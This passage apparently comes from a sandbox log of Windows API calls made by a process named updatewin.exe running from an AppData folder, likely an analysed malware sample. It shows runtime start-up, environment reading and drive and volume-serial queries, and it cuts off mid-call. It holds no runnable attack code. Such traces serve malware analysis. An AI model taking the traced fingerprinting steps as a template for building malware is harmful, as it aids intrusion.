lpSystemTimeAsFileTime=0x36fa7c*(dwLowDateTime=0xdebce1e0, dwHighDateTime=0x1d6d58a)) [0118.770] GetCurrentThreadId () returned 0xb28 [0118.770] GetCurrentProcessId () returned 0x524 [0118.770] QueryPerformanceCounter (in: lpPerformanceCount=0x36fa74 | out: lpPerformanceCount=0x36fa74*=23895691153) returned 1 [0118.784] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0118.784] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0118.840] GetLastError () returned 0x57 [0118.840] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0118.840] GetLastError () returned 0x57 [0118.840] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0118.840] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0118.840] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0118.840] GetLastError () returned 0x57 [0118.840] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0118.840] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0118.841] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0118.841] GetLastError () returned 0x57 [0118.841] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0118.841] GetLastError () returned 0x57 [0118.841] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0118.841] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0118.842] GetProcessHeap () returned 0x3f0000 [0118.842] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0118.842] GetLastError () returned 0x57 [0118.842] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0118.842] GetLastError () returned 0x57 [0118.842] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0118.842] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0118.842] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x364) returned 0x3ff150 [0118.842] SetLastError (dwErrCode=0x57) [0118.842] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xe00) returned 0x3ff4c0 [0118.844] GetStartupInfoW (in: lpStartupInfo=0x36f9b4 | out: lpStartupInfo=0x36f9b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x13dd730, hStdOutput=0x4e28abb6, hStdError=0xfffffffe)) [0118.844] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0118.844] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0118.844] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0118.844] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin.exe\" " [0118.844] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin.exe\" " [0118.844] GetACP () returned 0x4e4 [0118.844] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x220) returned 0x400ac8 [0118.845] IsValidCodePage (CodePage=0x4e4) returned 1 [0118.845] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x36f9d4 | out: lpCPInfo=0x36f9d4) returned 1 [0118.845] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x36f29c | out: lpCPInfo=0x36f29c) returned 1 [0118.845] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x36f8b0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0118.845] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x36f8b0, cbMultiByte=256, lpWideCharStr=0x36f038, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0118.845] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x36f2b0 | out: lpCharType=0x36f2b0) returned 1 [0118.845] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x36f8b0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0118.845] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x36f8b0, cbMultiByte=256, lpWideCharStr=0x36eff8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0118.845] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0118.845] GetLastError () returned 0x57 [0118.845] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0118.845] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0118.845] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x36ede8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0118.845] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x36f7b0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÂv!Oìù6", lpUsedDefaultChar=0x0) returned 256 [0118.846] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x36f8b0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0118.846] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x36f8b0, cbMultiByte=256, lpWideCharStr=0x36f008, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0118.846] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0118.846] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x36edf8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0118.846] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x36f6b0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÂv!Oìù6", lpUsedDefaultChar=0x0) returned 256 [0118.846] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x400cf0 [0118.846] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x36f7f8, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin.exe")) returned 0x5e [0118.846] GetProcAddress (hModule=0x76d30000, lpProcName="AreFileApisANSI") returned 0x76dc40d1 [0118.846] AreFileApisANSI () returned 1 [0118.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 95 [0118.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin.exe", cchWideChar=-1, lpMultiByteStr=0x13f3e18, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin.exe", lpUsedDefaultChar=0x0) returned 95 [0118.846] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x67) returned 0x400d78 [0118.847] RtlInitializeSListHead (in: ListHead=0x13f3a28 | out: ListHead=0x13f3a28) [0118.847] GetLastError () returned 0x0 [0118.847] SetLastError (dwErrCode=0x0) [0118.847] GetEnvironmentStringsW () returned 0x400de8* [0118.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0118.847] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x565) returned 0x4018c0 [0118.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x4018c0, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0118.847] FreeEnvironmentStringsW (penv=0x400de8) returned 1 [0118.847] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x98) returned 0x401e30 [0118.847] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x1f) returned 0x400560 [0118.847] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x36) returned 0x401ed0 [0118.847] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x37) returned 0x401f10 [0118.847] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x3c) returned 0x401f50 [0118.847] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x31) returned 0x401f98 [0118.847] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x17) returned 0x400de8 [0118.847] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x24) returned 0x400e08 [0118.847] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x14) returned 0x400e38 [0118.847] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xd) returned 0x400e58 [0118.847] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x25) returned 0x400e70 [0118.847] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x39) returned 0x400ea0 [0118.847] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x18) returned 0x400ee8 [0118.847] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x17) returned 0x400f08 [0118.848] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xe) returned 0x400f28 [0118.848] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x69) returned 0x400f40 [0118.848] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x3e) returned 0x400fb8 [0118.848] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x1b) returned 0x400588 [0118.848] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x1d) returned 0x4005b0 [0118.848] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x48) returned 0x401000 [0118.848] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x12) returned 0x401050 [0118.848] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x18) returned 0x401070 [0118.848] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x1b) returned 0x4005d8 [0118.848] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x24) returned 0x401090 [0118.848] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x29) returned 0x4010c0 [0118.848] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x1e) returned 0x400600 [0118.848] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x41) returned 0x4010f8 [0118.848] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x17) returned 0x401148 [0118.848] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xf) returned 0x401168 [0118.848] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x16) returned 0x401180 [0118.848] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x2a) returned 0x4011a0 [0118.848] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x29) returned 0x4011d8 [0118.848] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x15) returned 0x401210 [0118.848] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x1e) returned 0x400628 [0118.848] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x2a) returned 0x401230 [0118.848] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x12) returned 0x401268 [0118.848] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x18) returned 0x401288 [0118.848] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x46) returned 0x4012a8 [0118.848] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4018c0 | out: hHeap=0x3f0000) returned 1 [0118.848] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x800) returned 0x4012f8 [0118.848] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0118.849] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13dd268) returned 0x0 [0118.849] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x4006c8 [0118.849] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0118.849] GetLogicalDrives () returned 0x4 [0118.849] GetVolumeInformationA (in: lpRootPathName="C://", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x36f9d8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x36f9d8*=0x9c354b42, 